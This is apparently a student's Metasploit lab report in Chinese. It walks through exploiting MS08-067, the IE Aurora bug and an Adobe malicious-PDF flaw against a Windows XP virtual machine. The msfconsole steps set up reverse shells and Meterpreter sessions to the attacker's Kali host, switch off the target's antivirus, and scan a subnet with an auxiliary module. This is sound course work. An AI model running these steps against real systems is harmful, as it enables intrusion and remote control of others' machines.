20154332_Exp5_MSF基础应用

准备阶段
  • 在安装好window XP的虚拟机后查看靶机IP:192.168.160.130

  • kali IP:192.168.160.128

1、主动攻击:ms08_067
  • 先使用msfconsole进入msf,再用search ms08_067查询一下针对该漏洞的攻击模块:
    由此图可知:

  • 使用这个模块,show targets查看可以被攻击的靶机的操作系统型号:
  • 接下来可以查看相应的攻击载荷,首先我们可以查看可使用的载荷
    show payloads,

  • 我们想要获取靶机的shell
    set payload generic/shell_reverse_tcp

  • 查看配置渗透攻击所需的配置项show options

  • 通过上述操作,可以让我们知道有哪些参数需要进行配置
    set LHOST 192.168.160.128 //设置kali攻击IP,
    set RHOST 192.168.160.130 //设置靶机IP

  • 设置相应平台的编号:set target 0
    此处不设置也可以,msf平台可以自动帮你从第一个开始搜索满足要求的靶机平台

  • 发起渗透攻击 exploit获取shell如下图所示

  • 来看看靶机的ip


成功!

2、MS10_002_aurora漏洞攻击
  • 同上,先使用msfconsole进入msf,再用search MS10_002_aurora查询一下针对该漏洞的攻击模块: 由此图可知:

  • 使用这个攻击模块use exploit/windows/browser/ms10_002_aurora
    并获取靶机的shell set payload generic/shell_reverse_tcp

  • 将服务器端口设为set SRVPORT 80
    查看配置渗透攻击所需的配置项 show options

  • set LHOST 192.168.160.128 //设置kali攻击IP,

  • set SRVHOST 192.168.160.128

  • 发起渗透攻击 exploit

  • 成功生成了一个URL,在靶机的IE下访问。

  • 再回到kali中查看,如图所示,成功!

  • 尝试输入指令,成功。

  • 获得靶机ip

3. 对Adobe的漏洞攻击:adobe_toolbutton
  • 同上,先使用msfconsole进入msf,再用search adobe查询一下针对该漏洞的攻击模块,选择的是use exploit/windows/fileformat/adobe_toolbutton,然后使用该模块

  • 用info查看该模块的信息(这个指令相当于show targets、show options等的集合版)可以看到适合这个漏洞的版本:

  • set LHOST 192.168.160.128
    //kali ip

  • set LPORT 4332

  • set FILENAME 20154332.pdf//文件命名

  • 设置好相应参数后,开始实施攻击,发现在/root/.msf4/local/目录下成功生成了一个lxm.pdf文件:

  • 将pdf文件拷贝进入靶机中,进行回连依次输入

  • use exploit/multi/handler
    set payload
  • windows/meterpreter/reverse_tcp
  • set LHOST 192.168.160.128
  • set LPORT 4332
  • exploit
  • 第一次失败,因为靶机上开启了杀毒软件,

  • 关闭后再次尝试,

  • 尝试输入指令,成功!!!


4、辅助模块应用
  • 使用show auxiliary查看可以运用的辅助模块。

  • 先使用msfconsole进入msf,再用show auxiliary查看可以运用的辅助模块。由此图可知:

  • 我使用 use auxiliary/scanner/oracle/tnslsnr_version 模块

  • 用info查看一下需要更改的参数

  • 设置扫描区段: set RHOST 172.30.4.0/24

  • 设置线程: set THREADS 50

  • 创建完成,运行!

  • 成功!!!


基础问题回答:

(1)用自己的话解释什么是exploit,payload,encode.
  • exploit,就是可以利用漏洞去攻击,生成或启动已经设置好的攻击程序,获得相应权限。
  • payload,真正具有攻击性的代码包装成可插入到目标主机。
  • encode通过编码改变特征码。

实践总结与体会

这次的实验在发现漏洞,并根据此漏洞获取权限,在实验过程中可以发现,这些漏洞都是很早之前的漏洞,在一些新版本上根本使用不了,新版本已经有了改进,所以对实验中对软件的版本有很大的要求。
通过这次实验了解到漏洞如此之多,以后需要常打补丁,时常更新。

posted on 2018-04-19 17:22  4332renqing  阅读(161)  评论(0编辑  收藏  举报

导航